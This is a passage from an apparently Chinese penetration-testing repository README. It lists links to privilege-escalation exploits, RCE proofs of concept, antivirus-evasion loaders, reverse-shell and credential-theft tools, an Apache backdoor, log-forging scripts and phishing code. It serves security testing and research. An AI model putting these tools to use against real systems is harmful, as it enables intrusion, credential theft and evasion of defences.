kernels)2020ๅนด1ๆœˆๅ‰ๆฒกๆ‰“่กฅไธๅฏๆต‹่ฏ•](https://github.com/duasynt/xfrm_poc) - [linux-kernel-exploits Linuxๅนณๅฐๆๆƒๆผๆดž้›†ๅˆ](https://github.com/SecWiki/linux-kernel-exploits) - [Linuxๆๆƒ่พ…ๅŠฉๆฃ€ๆต‹Perl่„šๆœฌ](https://github.com/jondonas/linux-exploit-suggester-2)|[Linuxๆๆƒ่พ…ๅŠฉๆฃ€ๆต‹bash่„šๆœฌ](https://github.com/mzet-/linux-exploit-suggester) - [CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost](https://github.com/danigargu/CVE-2020-0796)|[ใ€Windowsๆๅ–ใ€‘Windows SMBv3 LPE exploit ๅทฒ็ผ–่ฏ‘็‰ˆ.exe](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)|[SMBGhost_RCE_PoC-่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒEXP](https://github.com/chompie1337/SMBGhost_RCE_PoC)|[Windows_SMBv3_RCE_CVE-2020-0796ๆผๆดžๅค็Žฐ](./books/Windows_SMBv3_RCE_CVE-2020-0796ๆผๆดžๅค็Žฐ.pdf) - [getAV---windowsๆ€่ฝฏ่ฟ›็จ‹ๅฏนๆฏ”ๅทฅๅ…ทๅ•ๆ–‡ไปถ็‰ˆ](./tools/getAV/) - [ใ€Windowsๆๆƒๅทฅๅ…ทใ€‘Windows 7 to Windows 10 / Server 2019](https://github.com/CCob/SweetPotato)|[ๆญ้…CS็š„ไฟฎๆ”น็‰ˆๅฏไธŠ็บฟsystemๆƒ้™็š„session](https://github.com/lengjibo/RedTeamTools/tree/master/windows/SweetPotato) - [ใ€Windowsๆๆƒๅทฅๅ…ทใ€‘SweetPotatoไฟฎๆ”น็‰ˆ๏ผŒ็”จไบŽwebshellไธ‹ๆ‰ง่กŒๅ‘ฝไปค](https://github.com/uknowsec/SweetPotato)|[ๆœฌๅœฐ็ผ–่ฏ‘ๅฅฝ็š„็‰ˆๆœฌ](./tools/SweetPotato.zip)|[็‚นๅ‡ปไธ‹่ฝฝๆˆ–ๅณ้”ฎๅฆๅญ˜ไธบ](https://raw.githubusercontent.com/Mr-xn/Penetration_Testing_POC/master/tools/SweetPotato.zip)|[SweetPotato_webshellไธ‹ๆ‰ง่กŒๅ‘ฝไปค็‰ˆ.pdf](./books/SweetPotato_webshellไธ‹ๆ‰ง่กŒๅ‘ฝไปค็‰ˆ.pdf) - [ใ€bypass UACใ€‘Windows 8.1 and 10 UAC bypass abusing WinSxS in "dccw.exe"](https://github.com/L3cr0f/DccwBypassUAC/) - [ใ€Windowsๆๆƒใ€‘CVE-2018-8120 Exploit for Win2003 Win2008 WinXP Win7](https://github.com/alpha1ab/CVE-2018-8120) - [ใ€Windowsๆๆƒ Windows 10&Server 2019ใ€‘PrintSpoofer-Abusing Impersonation Privileges on Windows 10 and Server 2019](https://github.com/itm4n/PrintSpoofer)|[้…ๅˆๆ–‡็ซ ้ฃŸ็”จ-pipePotatoๅค็Žฐ](./books/pipePotatoๅค็Žฐ.pdf)|[Windows ๆƒ้™ๆๅ‡ BadPotato-ๅทฒ็ปๅœจWindows 2012-2019 8-10 ๅ…จ่กฅไธๆต‹่ฏ•ๆˆๅŠŸ](https://github.com/BeichenDream/BadPotato) - [ใ€Windowsๆๆƒใ€‘Windows ไธ‹็š„ๆๆƒๅคงๅˆ้›†](https://github.com/lyshark/Windows-exploits) - [ใ€Windowsๆๆƒใ€‘-CVE-2020-1048 | PrintDemonๆœฌๅœฐๆๆƒๆผๆดž-ๆผๆดžๅฝฑๅ“่‡ช1996ๅนดไปฅๆฅๅ‘ๅธƒ(Windows NT 4)็š„ๆ‰€ๆœ‰Windows็‰ˆๆœฌ](https://github.com/ionescu007/PrintDemon) - [ใ€Windows bypass UACใ€‘UACME-ไธ€็ง้›†ๆˆไบ†60ๅคš็งBypass UAC็š„ๆ–นๆณ•](https://github.com/hfiref0x/UACME) - [CVE-2020โ€“1088๏ผš Windows wersvc.dll ไปปๆ„ๆ–‡ไปถๅˆ ้™คๆœฌๅœฐๆๆƒๆผๆดžๅˆ†ๆž](https://medium.com/csis-techblog/cve-2020-1088-yet-another-arbitrary-delete-eop-a00b97d8c3e2) - [ใ€Windowsๆๆƒใ€‘CVE-2019-0863-Windowsไธญ้”™่ฏฏๆŠฅๅ‘Šๆœบๅˆถๅฏผ่‡ด็š„ๆๆƒ-EXP](https://github.com/sailay1996/WerTrigger) - [ใ€Windowsๆๆƒใ€‘CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP) - [ใ€Windowsๆๆƒใ€‘CVE-2020-0787-EXP-ALL-WINDOWS-VERSION-้€‚็”จไบŽWindowsๆ‰€ๆœ‰็‰ˆๆœฌ็š„ๆๆƒEXP](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION) - [ใ€Windowsๆๆƒใ€‘CVE-2020-1054-Win32kๆๆƒๆผๆดžPoc](https://github.com/0xeb-bp/cve-2020-1054)|[CVE-2020-1054-POC](https://github.com/Iamgublin/CVE-2020-1054) - [ใ€Linuxๆๆƒใ€‘ๅฏนLinuxๆๆƒ็š„็ฎ€ๅ•ๆ€ป็ป“](./books/ๅฏนLinuxๆๆƒ็š„็ฎ€ๅ•ๆ€ป็ป“.pdf) - [ใ€Windowsๆๆƒใ€‘wesng-Windowsๆๆƒ่พ…ๅŠฉ่„šๆœฌ](https://github.com/bitsadmin/wesng) - [ใ€Windowsๆๆƒใ€‘dazzleUPๆ˜ฏไธ€ๆฌพ็”จๆฅๅธฎๅŠฉๆธ—้€ๆต‹่ฏ•ไบบๅ‘˜่ฟ›่กŒๆƒ้™ๆๅ‡็š„ๅทฅๅ…ท๏ผŒๅฏไปฅๅœจwindow็ณป็ปŸไธญๆŸฅๆ‰พ่„†ๅผฑ้ข่ฟ›่กŒๆ”ปๅ‡ปใ€‚ๅทฅๅ…ทๅŒ…ๆ‹ฌไธค้ƒจๅˆ†ๆฃ€ๆŸฅๅ†…ๅฎน๏ผŒexploitๆฃ€ๆŸฅๅ’Œ้”™่ฏฏ้…็ฝฎๆฃ€ๆŸฅใ€‚](https://github.com/hlldz/dazzleUP) ## <span id="head6"> PC</span> - [ ๅพฎ่ฝฏRDP่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž๏ผˆCVE-2019-0708๏ผ‰](./BlueKeep) - [CVE-2019-0708-python็‰ˆ](./BlueKeep/bluekeep-CVE-2019-0708-python) - [MS17-010-ๅพฎ่ฝฏๆฐธๆ’ไน‹่“ๆผๆดž](https://github.com/Mr-xn/MS17-010) - [macOS-Kernel-Exploit](./macOS-Kernel-Exploit) - [CVE-2019-1388 UACๆๆƒ (nt authority\system)](https://github.com/jas502n/CVE-2019-1388) - [CVE-2019-1405ๅ’ŒCVE-2019-1322๏ผš้€š่ฟ‡็ป„ๅˆๆผๆดž่ฟ›่กŒๆƒ้™ๆๅ‡ Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation](https://github.com/apt69/COMahawk) - [CVE-2019-11708](https://github.com/0vercl0k/CVE-2019-11708) - [Telegram(macOS v4.9.155353) ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/Metnew/telegram-links-nsworkspace-open) - [Remote Desktop Gateway RCE bugs CVE-2020-0609 & CVE-2020-0610](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) - [Microsoft SharePoint - Deserialization Remote Code Execution](https://github.com/Voulnet/desharialize/blob/master/desharialize.py) - [CVE-2020-0728-Windows Modules Installer Service ไฟกๆฏๆณ„้œฒๆผๆดž](https://github.com/irsl/CVE-2020-0728/) - [CVE-2020-0618: ๅพฎ่ฝฏ SQL Server Reporting Services่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ๏ผˆRCE๏ผ‰ๆผๆดž](https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/)|[GitHub้ชŒ่ฏPOC(ๅ…ถๅฎžๅ‰ๆ–‡็š„ๅˆ†ๆžๆ–‡็ซ ไนŸๆœ‰)](https://github.com/euphrat1ca/CVE-2020-0618) - [CVE-2020-0767Microsoft ChakraCore่„šๆœฌๅผ•ๆ“Žใ€Edgeๆต่งˆๅ™จไธญ็š„ไธ€ไธชๅผ€ๆบ็š„ChakraJavaScript่„šๆœฌๅผ•ๆ“Ž็š„ๆ ธๅฟƒ้ƒจๅˆ†ใ€‘ๅฎ‰ๅ…จๆผๆดž](https://github.com/phoenhex/files/blob/master/pocs/cve-2020-0767.js) - [CVE-2020-0688๏ผšๅพฎ่ฝฏEXCHANGEๆœๅŠก็š„่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/random-robbie/cve-2020-0688)|[CVE-2020-0688_EXP---ๅฆไธ€ไธชๆผๆดžๆฃ€ๆต‹ๅˆฉ็”จ่„šๆœฌ](https://github.com/Yt1g3r/CVE-2020-0688_EXP)|[ๅˆไธ€ไธชcve-2020-0688ๅˆฉ็”จ่„šๆœฌ](https://github.com/Ridter/cve-2020-0688)|[Exploit and detect tools for CVE-2020-0688](https://github.com/zcgonvh/CVE-2020-0688) - [CVE-2020-0674: Internet Explorer่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดžๆฃ€ๆต‹](https://github.com/binaryfigments/CVE-2020-0674) - [CVE-2020-8794: OpenSMTPD ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž](./CVE-2020-8794-OpenSMTPD%20่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž.md) - [Linuxๅนณๅฐ-CVE-2020-8597: PPPD ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/marcinguy/CVE-2020-8597) - [Windows-CVE-2020-0796๏ผš็–‘ไผผๅพฎ่ฝฏSMBv3ๅ่ฎฎโ€œ่ •่™ซ็บงโ€ๆผๆดž](https://cert.360.cn/warning/detail?id=04f6a686db24fcfa478498f55f3b79ef)|[็›ธๅ…ณ่ฎจ่ฎบ](https://linustechtips.com/main/topic/1163724-smbv3-remote-code-execution-cve-2020-0796/)|[CVE-2020โ€“0796ๆฃ€ๆต‹ไธŽไฟฎๅค](CVE-2020-0796ๆฃ€ๆต‹ไธŽไฟฎๅค.md)|[ๅˆไธ€ไธชCVE-2020-0796็š„ๆฃ€ๆต‹ๅทฅๅ…ท-ๅฏๅฏผ่‡ด็›ฎๆ ‡็ณป็ปŸๅดฉๆบƒ้‡ๅฏ](https://github.com/eerykitty/CVE-2020-0796-PoC) - [SMBGhost_RCE_PoC๏ผˆCVE-2020-0796๏ผ‰](https://github.com/chompie1337/SMBGhost_RCE_PoC) - [WinRAR ไปฃ็ ๆ‰ง่กŒๆผๆดž (CVE-2018-20250)-POC](https://github.com/Ridter/acefile)|[็›ธๅ…ณๆ–‡็ซ ](https://research.checkpoint.com/2019/extracting-code-execution-from-winrar/)|[ๅ…จ็ฝ‘็ญ›ๆŸฅ WinRAR ไปฃ็ ๆ‰ง่กŒๆผๆดž (CVE-2018-20250)](https://xlab.tencent.com/cn/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/) - [windows10็›ธๅ…ณๆผๆดžEXP&POC](https://github.com/nu11secur1ty/Windows10Exploits) - [shiro rce ๅๅบๅˆ— ๅ‘ฝไปคๆ‰ง่กŒ ไธ€้”ฎๅทฅๅ…ท](https://github.com/wyzxxz/shiro_rce) - [CVE-2019-1458-Win32kไธญ็š„็‰นๆƒๆๅ‡ๆผๆดžใ€shellๅฏ็”จ-Windowsๆๅ–ใ€‘](https://github.com/unamer/CVE-2019-1458) - [CVE-2019-1253-Windowsๆƒ้™ๆๅ‡ๆผๆดž-AppXSvcไปปๆ„ๆ–‡ไปถๅฎ‰ๅ…จๆ่ฟฐ็ฌฆ่ฆ†็›–EoP็š„ๅฆไธ€็งpoc](https://github.com/sgabe/CVE-2019-1253)|[CVE-2019-1253](https://github.com/padovah4ck/CVE-2019-1253) - [BypassAVใ€ๅ…ๆ€ใ€‘Cobalt Strikeๆ’ไปถ๏ผŒ็”จไบŽๅฟซ้€Ÿ็”Ÿๆˆๅ…ๆ€็š„ๅฏๆ‰ง่กŒๆ–‡ไปถ](https://github.com/hack2fun/BypassAV) - [CVE-2020-0674๏ผšInternet Explorer UAF ๆผๆดžexpใ€ๅœจ64ไฝ็š„win7ๆต‹่ฏ•ไบ†IE 8, 9, 10, and 11ใ€‘](https://github.com/maxpl0it/CVE-2020-0674-Exploit) - [SMBGhost_AutomateExploitation-SMBGhost (CVE-2020-0796) Automate Exploitation and Detection](https://github.com/Barriuso/SMBGhost_AutomateExploitation) - [MS Windows OLE ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž(CVE-2020-1281)](https://github.com/guhe120/Windows-EoP/tree/master/CVE-2020-1281) - [CVE-2020-1350-Windows็š„DNSๆœๅŠกๅ™จRCEๆฃ€ๆต‹็š„powershell่„šๆœฌ](https://github.com/T13nn3s/CVE-2020-1350)|[CVE-2020-1350-DoS](https://github.com/maxpl0it/CVE-2020-1350-DoS) - [CVE-2020-1362-Microsoft Windows WalletServiceๆƒ้™ๆๅ‡ๆผๆดž](https://github.com/Q4n/CVE-2020-1362) - [CVE-2020-10713-GRUB2 ๆœฌๅœฐไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/eclypsium/BootHole) - [CVE-2020-1313-Microsoft Windows Update Orchestrator Serviceๆƒ้™ๆๅ‡ๆผๆดž๏ผŒๅฏ็”จไบŽWindowsๆๆƒๆ“ไฝœ๏ผŒๆ”ฏๆŒๆ–ฐ็‰ˆ็š„Windows server 2004](https://github.com/irsl/CVE-2020-1313) - [CVE-2020-1337-exploit-Windows 7/8/10ไธŠPrint Spooler็ป„ไปถๆผๆดžไฟฎๅคๅŽ็š„็ป•่ฟ‡](https://github.com/math1as/CVE-2020-1337-exploit/)|[cve-2020-1337-poc](https://github.com/sailay1996/cve-2020-1337-poc) ## <span id="head7"> tools-ๅฐๅทฅๅ…ท้›†็‰ˆๆœฌๅˆ</span> - [java็Žฏๅขƒไธ‹ไปปๆ„ๆ–‡ไปถไธ‹่ฝฝๆƒ…ๅ†ต่‡ชๅŠจๅŒ–่ฏปๅ–ๆบ็ ็š„ๅฐๅทฅๅ…ท](https://github.com/Artemis1029/Java_xmlhack) - [Linux SSH็™ปๅฝ•ๆ—ฅๅฟ—ๆธ…้™ค/ไผช้€ ](./tools/ssh) - [python2็š„socksไปฃ็†](./tools/s5.py) - [dede_burp_admin_path-dedecmsๅŽๅฐ่ทฏๅพ„็ˆ†็ ด(Windows็Žฏๅขƒ)](./tools/dede_burp_admin_path.md) - [PHP 7.1-7.3 disable_functions bypass](./tools/PHP%207.1-7.3%20disable_functions%20bypass.md) - [ไธ€ไธชๅ„็งๆ–นๅผ็ช็ ดDisable_functions่พพๅˆฐๅ‘ฝไปคๆ‰ง่กŒ็š„shell](https://github.com/l3m0n/Bypass_Disable_functions_Shell) - [ใ€PHPใ€‘bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)](https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD) - [ๅฆไธ€ไธชbypass PHP็š„disable_functions](https://github.com/mm0r1/exploits) - [cmdไธ‹ๆŸฅ่ฏข3389่ฟœ็จ‹ๆกŒ้ข็ซฏๅฃ](./tools/cmdไธ‹ๆŸฅ่ฏข3389่ฟœ็จ‹ๆกŒ้ข็ซฏๅฃ.md) - [ไผช่ฃ…ๆˆไผไธšๅพฎไฟกๅ็‰‡็š„้’“้ฑผไปฃ็ ](./tools/ไผช่ฃ…ๆˆไผไธšๅพฎไฟกๅ็‰‡็š„้’“้ฑผไปฃ็ .txt) - [vbulletin5-rceๅˆฉ็”จๅทฅๅ…ท(ๆ‰น้‡ๆฃ€ๆต‹/getshell)](https://github.com/theLSA/vbulletin5-rce)/[ไฟๅญ˜ไบ†ไธ€ไปฝๆบ็ :vbulletin5-rce.py](./tools/vbulletin5-rce.py) - [CVE-2017-12615](./tools/CVE-2017-12615.py) - [้€š่ฟ‡Shodanๅ’Œfavicon iconๅ‘็Žฐ็œŸๅฎžIPๅœฐๅ€](https://github.com/pielco11/fav-up) - [Cobalt_Strikeๆ‰ฉๅฑ•ๆ’ไปถ](./tools/Cobalt_Strikeๆ‰ฉๅฑ•ๆ’ไปถ.md) - [Windowsๅ‘ฝไปค่กŒcmd็š„็ฉบๆ ผๆ›ฟๆข](./tools/Windowsๅ‘ฝไปค่กŒcmd็š„็ฉบๆ ผๆ›ฟๆข.md) - [็ป•่ฟ‡disable_functionๆฑ‡ๆ€ป](./tools/็ป•่ฟ‡disable_functionๆฑ‡ๆ€ป.md) - [WAF Bypass](https://chybeta.gitbooks.io/waf-bypass/content/) - [ๅ‘ฝไปคๆณจๅ…ฅๆ€ป็ป“](./tools/ๅ‘ฝไปคๆณจๅ…ฅๆ€ป็ป“.md) - [้š่—wifi-ssid่Žทๅ– ยท theKingOfNight's Blog](./books/้š่—wifi-ssid่Žทๅ–%20ยท%20theKingOfNight's%20Blog.pdf) - [crt.sh่ฏไนฆ/ๅŸŸๅๆ”ถ้›†](./tools/crt.sh่ฏไนฆๆ”ถ้›†.py) - [TPๆผๆดž้›†ๅˆๅˆฉ็”จๅทฅๅ…ทpy3็‰ˆๆœฌ-ๆฅ่‡ชๅฅ‡ๅฎ‰ไฟกๅคงไฝฌLucifer1993](https://github.com/Mr-xn/TPscan) - [Python2็ผ–ๅ†™็š„struts2ๆผๆดžๅ…จ็‰ˆๆœฌๆฃ€ๆต‹ๅ’Œๅˆฉ็”จๅทฅๅ…ท-ๆฅ่‡ชๅฅ‡ๅฎ‰ไฟกๅคงไฝฌLucifer1993](https://github.com/Mr-xn/struts-scan) - [sqlmap_bypass_D็›พ_tamper](./tools/sqlmap_bypass_D็›พ_tamper.py) - [sqlmap_bypass_ๅฎ‰ๅ…จ็‹—_tamper](./tools/sqlmap_bypass_ๅฎ‰ๅ…จ็‹—_tamper.py) - [sqlmap_bypass_็ฉบๆ ผๆ›ฟๆขๆˆๆข่กŒ็ฌฆ-ๆŸไผไธšๅปบ็ซ™็จ‹ๅบ่ฟ‡ๆปค_tamper](./tools/sqlmap_bypass_็ฉบๆ ผๆ›ฟๆขๆˆๆข่กŒ็ฌฆ-ๆŸไผไธšๅปบ็ซ™็จ‹ๅบ่ฟ‡ๆปค_tamper.py) - [sqlmap_bypass_ไบ‘้”_tamper](./tools/sqlmap_bypass_ไบ‘้”_tamper.py) - [masscan+nmapๆ‰ซๆ่„šๆœฌ](./tools/masscan%2Bnmap.py) - [PHP่งฃๅฏ†ๆ‰ฉๅฑ•](https://github.com/Albert-Zhan/php-decrypt) - [linuxไฟกๆฏๆ”ถ้›†/ๅบ”ๆ€ฅๅ“ๅบ”/ๅธธ่งๅŽ้—จๆฃ€ๆต‹่„šๆœฌ](https://github.com/al0ne/LinuxCheck) - [RdpThief-ไปŽ่ฟœ็จ‹ๆกŒ้ขๅฎขๆˆท็ซฏๆๅ–ๆ˜Žๆ–‡ๅ‡ญๆฎ่พ…ๅŠฉๅทฅๅ…ท](https://github.com/0x09AL/RdpThief) - [ไฝฟ็”จpowershellๆˆ–CMD็›ดๆŽฅ่ฟ่กŒๅ‘ฝไปคๅๅผนshell](https://github.com/ZHacker13/ReverseTCPShell) - [FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODBๅผฑๅฃไปคๆฃ€ๆต‹](https://github.com/netxfly/x-crack) - [GitHack-.gitๆณ„้œฒๅˆฉ็”จ่„šๆœฌ](https://github.com/lijiejie/GitHack) - [GitHacker---ๆฏ”GitHackๆ›ดๅฅฝ็”จ็š„gitๆณ„้œฒๅˆฉ็”จ่„šๆœฌ](https://github.com/WangYihang/GitHacker) - [SVNๆบไปฃ็ ๆณ„้œฒๅ…จ็‰ˆๆœฌDumpๆบ็ ](https://github.com/admintony/svnExploit) - [ๅคš่ฟ›็จ‹ๆ‰น้‡็ฝ‘็ซ™ๅค‡ไปฝๆ–‡ไปถๆ‰ซๆ](https://github.com/sry309/ihoneyBakFileScan) - [Empire](https://github.com/BC-SECURITY/Empire/)|็›ธๅ…ณๆ–‡็ซ :[ๅŽๆธ—้€ๆต‹่ฏ•็ฅžๅ™จEmpire่ฏฆ่งฃ](https://mp.weixin.qq.com/s/xCtkoIwVomx5f8hVSoGKpA) - [FOFA Pro view ๆ˜ฏไธ€ๆฌพFOFA Pro ่ต„ไบงๅฑ•็คบๆต่งˆๅ™จๆ’ไปถ๏ผŒ็›ฎๅ‰ๅ…ผๅฎน Chromeใ€Firefoxใ€Opera](https://github.com/0nise/fofa_view) - [Zoomeye Tools-ไธ€ๆฌพๅˆฉ็”จZoomeye ่Žทๅ–ๆœ‰ๅ…ณๅฝ“ๅ‰็ฝ‘้กตIPๅœฐๅ€็š„ๅ„็งไฟกๆฏ(้œ€่ฆ็™ปๅฝ•)](https://chrome.google.com/webstore/detail/zoomeye-tools/bdoaeiibkccgkbjbmmmoemghacnkbklj) - [360 0Kee-Team ็š„ crawlergoๅŠจๆ€็ˆฌ่™ซ ็ป“ๅˆ ้•ฟไบญXRAYๆ‰ซๆๅ™จ็š„่ขซๅŠจๆ‰ซๆๅŠŸ่ƒฝ](https://github.com/timwhitez/crawlergo_x_XRAY) - [ๅ†…็ฝ‘็ฅžๅ™จXerosploit-ๅจฑไนๆ€ง่ดจ(็ซฏๅฃๆ‰ซๆ|DoSๆ”ปๅ‡ป|HTMLไปฃ็ ๆณจๅ…ฅ|JavaScriptไปฃ็ ๆณจๅ…ฅ|ไธ‹่ฝฝๆ‹ฆๆˆชๅ’Œๆ›ฟๆข|ๅ—…ๆŽขๆ”ปๅ‡ป|DNSๆฌบ้ช—|ๅ›พ็‰‡ๆ›ฟๆข|Web้กต้ข็ฏกๆ”น|Drifnet)](https://github.com/LionSec/xerosploit) - [ไธ€ไธชๅŒ…ๅซphp,java,python,C#็ญ‰ๅ„็ง่ฏญ่จ€็‰ˆๆœฌ็š„XXEๆผๆดžDemo](https://github.com/c0ny1/xxe-lab) - [ๅ†…็ฝ‘ๅธธ่งๆธ—้€ๅทฅๅ…ทๅŒ…](https://github.com/yuxiaokui/Intranet-Penetration) - [ไปŽๅ†…ๅญ˜ไธญๅŠ ่ฝฝ SHELLCODE bypass AVๆŸฅๆ€](https://github.com/brimstone/go-shellcode)|[twitter็คบไพ‹](https://twitter.com/jas502n/status/1213847002947051521) - [ๆต้‡่ฝฌๅ‘ๅทฅๅ…ท-pingtunnelๆ˜ฏๆŠŠtcp/udp/sock5ๆต้‡ไผช่ฃ…ๆˆicmpๆต้‡่ฟ›่กŒ่ฝฌๅ‘็š„ๅทฅๅ…ท](https://github.com/esrrhs/pingtunnel) - [ๅ†…็ฝ‘ๆธ—้€-ๅˆ›ๅปบWindows็”จๆˆท(ๅฝ“net net1 ็ญ‰ๅธธ่งๅ‘ฝไปค่ขซ่ฟ‡ๆปคๆ—ถ,ไธ€ไธชๆ–‡ไปถๆ‰ง่กŒ็›ดๆŽฅๆทปๅŠ ไธ€ไธช็ฎก็†ๅ‘˜ใ€้œ€่ฆshellๅ…ทๆœ‰็ฎก็†ๅ‘˜ๆƒ้™lใ€‘](https://github.com/newsoft/adduser)|[adduserไฝฟ็”จๆ–นๆณ•](./adduserๆทปๅŠ ็”จๆˆท.md) - [pypykatz-้€š่ฟ‡python3ๅฎž็ŽฐๅฎŒๆ•ด็š„MimikatzๅŠŸ่ƒฝ(python3.6+)](https://github.com/skelsec/pypykatz) - [ใ€windowsใ€‘Bypassing AV via in-memory PE execution-้€š่ฟ‡ๅœจๅ†…ๅญ˜ไธญๅŠ ่ฝฝๅคšๆฌกXORๅŽ็š„payloadๆฅbypassๆ€่ฝฏ](https://blog.dylan.codes/bypassing-av-via/)|[ไฝœ่€…่‡ชๅปบgitlabๅœฐๅ€](https://git.dylan.codes/batman/darkarmour) - [wafw00f-ๅธฎๅŠฉไฝ ๅฟซ้€Ÿ่ฏ†ๅˆซwebๅบ”็”จๆ˜ฏๅฆไฝฟ็”จไฝ•็งWAF(ๆ‰ซๆไน‹ๅ‰ๅพˆๆœ‰็”จ)](https://github.com/EnableSecurity/wafw00f) - [Linuxๆๅ–ๅ…ถไป–็”จๆˆทๅฏ†็ ็š„ๅทฅๅ…ท(้œ€่ฆrootๆƒ้™)](https://github.com/huntergregal/mimipenguin) - [apache2_BackdoorMod-apacheๅŽ้—จๆจกๅ—](https://github.com/VladRico/apache2_BackdoorMod) - [ๅฏนๅฏ†็ ๅทฒไฟๅญ˜ๅœจ Windwos ็ณป็ปŸไธŠ็š„้ƒจๅˆ†็จ‹ๅบ่ฟ›่กŒ่งฃๆž,ๅŒ…ๆ‹ฌ๏ผšNavicat,TeamViewer,FileZilla,WinSCP,Xmangager็ณปๅˆ—ไบงๅ“๏ผˆXshell,Xftp)](https://github.com/uknowsec/SharpDecryptPwd) - [ไธ€ไธช็ฎ€ๅ•ๆŽขๆต‹jbossๆผๆดž็š„ๅทฅๅ…ท](https://github.com/GGyao/jbossScan) - [ไธ€ๆฌพlcxๅœจgolangไธ‹็š„ๅฎž็Žฐ-้€‚ๅˆๅ†…็ฝ‘ไปฃ็†ๆต้‡ๅˆฐๅ…ฌ็ฝ‘,ๆฏ”ๅฆ‚้˜ฟ้‡Œไบ‘็š„ๆœบๅ™จไปฃ็†ๅˆฐไฝ ็š„ๅ…ฌ็ฝ‘ๆœบๅ™จ](https://github.com/cw1997/NATBypass) - [Cobalt Strike Aggressor ๆ’ไปถๅŒ…](https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts) - [Erebus-Cobalt StrikeๅŽๆธ—้€ๆต‹่ฏ•ๆ’ไปถ,ๅŒ…ๆ‹ฌไบ†ไฟกๆฏๆ”ถ้›†ใ€ๆƒ้™่Žทๅ–ใ€ๅฏ†็ ่Žทๅ–ใ€็—•่ฟนๆธ…้™ค็ญ‰็ญ‰ๅธธ่ง็š„่„šๆœฌๆ’ไปถ](https://github.com/DeEpinGh0st/Erebus) - [IP/IPๆฎต่ต„ไบงๆ‰ซๆ-->ๆ‰ซๆๅผ€ๆ”พ็ซฏๅฃ่ฏ†ๅˆซ่ฟ่กŒๆœๅŠก้ƒจ็ฝฒ็ฝ‘็ซ™-->่‡ชๅŠจๅŒ–ๆ•ด็†ๆ‰ซๆ็ป“ๆžœ-->่พ“ๅ‡บๅฏ่ง†ๅŒ–ๆŠฅ่กจ+ๆ•ด็†็ป“ๆžœ](https://github.com/LangziFun/LangNetworkTopology3) - [A script to scan for unsecured Laravel .env files](https://github.com/tismayil/laravelN00b) - [Struts2ๆผๆดžๆ‰ซๆGolang็‰ˆ-ใ€็‰น็‚น:ๅ•ๆ–‡ไปถใ€ๅ…จๅนณๅฐๆ”ฏๆŒใ€ๅฏๅœจwebshellไธ‹ไฝฟ็”จใ€‘](https://github.com/x51/STS2G) - [Shiro<=1.2.4ๅๅบๅˆ—ๅŒ–๏ผŒไธ€้”ฎๆฃ€ๆต‹ๅทฅๅ…ท](https://github.com/sv3nbeast/ShiroScan)|[Apache shiro <= 1.2.4 rememberMe ๅๅบๅˆ—ๅŒ–ๆผๆดžๅˆฉ็”จๅทฅๅ…ท](https://github.com/acgbfull/Apache_Shiro_1.2.4_RCE) - [ๅฎŒๆ•ดweblogic ๆผๆดžๆ‰ซๆๅทฅๅ…ทไฟฎๅค็‰ˆ](https://github.com/0xn0ne/weblogicScanner) - [GitHubๆ•ๆ„Ÿไฟกๆฏๆณ„้œฒ็›‘ๆŽง](https://github.com/FeeiCN/GSIL) - [Javaๅฎ‰ๅ…จ็›ธๅ…ณ็š„ๆผๆดžๅ’ŒๆŠ€ๆœฏdemo](https://github.com/threedr3am/learnjavabug) - [ๅœจ็บฟๆ‰ซๆ-็ฝ‘็ซ™ๅŸบ็ก€ไฟกๆฏ่Žทๅ–|ๆ—็ซ™|็ซฏๅฃๆ‰ซๆ|ไฟกๆฏๆณ„้œฒ](https://scan.top15.cn/web/) - [bayonetๆ˜ฏไธ€ๆฌพsrc่ต„ไบง็ฎก็†็ณป็ปŸ๏ผŒไปŽๅญๅŸŸๅใ€็ซฏๅฃๆœๅŠกใ€ๆผๆดžใ€็ˆฌ่™ซ็ญ‰ไธ€ไฝ“ๅŒ–็š„่ต„ไบง็ฎก็†็ณป็ปŸ](https://github.com/CTF-MissFeng/bayonet) - [ๅ†…็ฝ‘ๆธ—้€ไธญๅธธ็”จ็š„c#็จ‹ๅบๆ•ดๅˆๆˆcs่„šๆœฌ๏ผŒ็›ดๆŽฅๅ†…ๅญ˜ๅŠ ่ฝฝ](https://github.com/uknowsec/SharpToolsAggressor) - [ใ€ๆผๆดžๅบ“ใ€‘ๅˆไธ€ไธชๅ„็งๆผๆดžpocใ€Exp็š„ๆ”ถ้›†ๆˆ–็ผ–ๅ†™](https://github.com/coffeehb/Some-PoC-oR-ExP) - [ใ€ๅ†…็ฝ‘ไปฃ็†ใ€‘ๅ†…็ฝ‘ๆธ—้€ไปฃ็†่ฝฌๅ‘ๅˆฉๅ™จreGeorg](https://github.com/sensepost/reGeorg)|**็›ธๅ…ณๆ–‡็ซ 